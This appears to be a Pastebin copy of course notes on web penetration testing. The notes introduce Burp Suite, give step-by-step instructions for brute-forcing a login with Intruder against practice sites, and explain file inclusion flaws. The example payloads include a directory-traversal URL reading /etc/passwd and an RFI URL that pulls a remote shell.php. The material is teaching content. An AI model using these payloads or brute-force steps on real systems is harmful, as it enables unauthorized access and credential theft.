API tools faq
paste
Prabhankar0HS0

burp

Prabhankar0HS0
Aug 2nd, 2018
632
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.34 KB | None | 0 0
raw download clone embed print report
  1. Session 14
  2. ===========
  3.  
  4.  
  5.  
  6.  
  7. INTRODUCTION TO BURP SUITE
  8. ===========================
  9. Burp Suite is a graphical tool for testing Web application security. Burp Scanner can automatically move parameters between different locations, such as URL parameters and cookies for doing Vulnerability Assessment and Penetration Testing of a Web Application.
  10.  
  11. The tool is written in Java and developed by a organization named PortSwigger Security. We also use Burp Suite for Tampering of data moving through one Node to another.
  12. There are particularly 2 Versions of Burp Suite :
  13.  
  14. = Professional Version $349.00 per user, per year having all the functions.
  15. = Community Edition which is free of cost.
  16.  
  17.  
  18. Features to be discussed in Burpesuite :
  19. Spider
  20. Repeater
  21. Intruder
  22. Proxy
  23.  
  24.  
  25.  
  26. BRUTE FORCING USING BURP SUITE
  27. ===============================
  28.  
  29. Brute Force Attack : Brute forcing is a trial and error method used by application programs to decode encrypted data such as passwords by hit and trial through exhaustive effort by employing intellectual strategies.
  30.  
  31. Let us first understand the flaw through which Brute Forcing is working. Brute Forcing is working because of the flaw of Filtration on Login Forms. If there is not any extra layer of security or any limit to enter the credentials, Brute Forcing can be done.
  32.  
  33.  
  34. STEPS :
  35. =======
  36.  
  37. => Setting Up Proxy Settings in Browser
  38. - Browser Setting > Network Setting > Proxy Configuration > Manual Proxy > Enter a Socket with local host > 127.0.0.1:8080
  39. - Check mark it > Use this proxy server for all protocol
  40. - Clear all details from "No Proxy for".
  41. - Click on Apply.
  42. For proper funtioning download the certficate from http://burp.
  43. import the certificate and tick all the options provided and click on ok.
  44.  
  45.  
  46. Now open burpsuit:
  47. => Go to Proxy > Options > Enter Proxy Socket which we entered on the Browser Settings.
  48. => Click on Intercept > Intercept is ON (This will start capturing moving packets)
  49. On entering the credentials or any request and pressing on Enter or ok the request will go to burpesuit first before going to the actual page.
  50. So it will blink until unless you dont open burpesuit.
  51. => Burp Suite have captured a Packet, Select that Packet from Burp Suite containing credentials > Right Click > Send to Intruder.
  52. => Turn Off Intercept Mode.
  53. => Go to Intruder > Position > Clear
  54. => Select the Parameters you want to start brute forcing on.
  55. - Select value of username < Add
  56. - Select value of password < Add
  57.  
  58. => Go to Payloads > Setting up a Wordlist in Payloads > Giving a Default list on any random Credentials for Login into DVWA or demo.testfire.net
  59. => Select Values for Payloads
  60. Payload : 1 > dic file of username.
  61. Payload : 2 > dic. file for password.
  62. => Options > Grep Match > Clear
  63. => Username and/or password incorrect. < Add.
  64. => Click on “Start Attack”
  65. => Find out the Correct Username and Password and enter.
  66.  
  67.  
  68.  
  69. =x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=
  70.  
  71. Local File Inclusion (also known as LFI)
  72. ==========================================
  73. It is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.
  74.  
  75. ex: http://vulnerable_host/preview.php?file=../../../../etc/passwd
  76.  
  77. Remote File Inclusion (also known as RFI)
  78. ============================================
  79. It is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.
  80.  
  81. ex: www.xyz.com/contacts.php?page=http://www.abc.com/shell.php
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!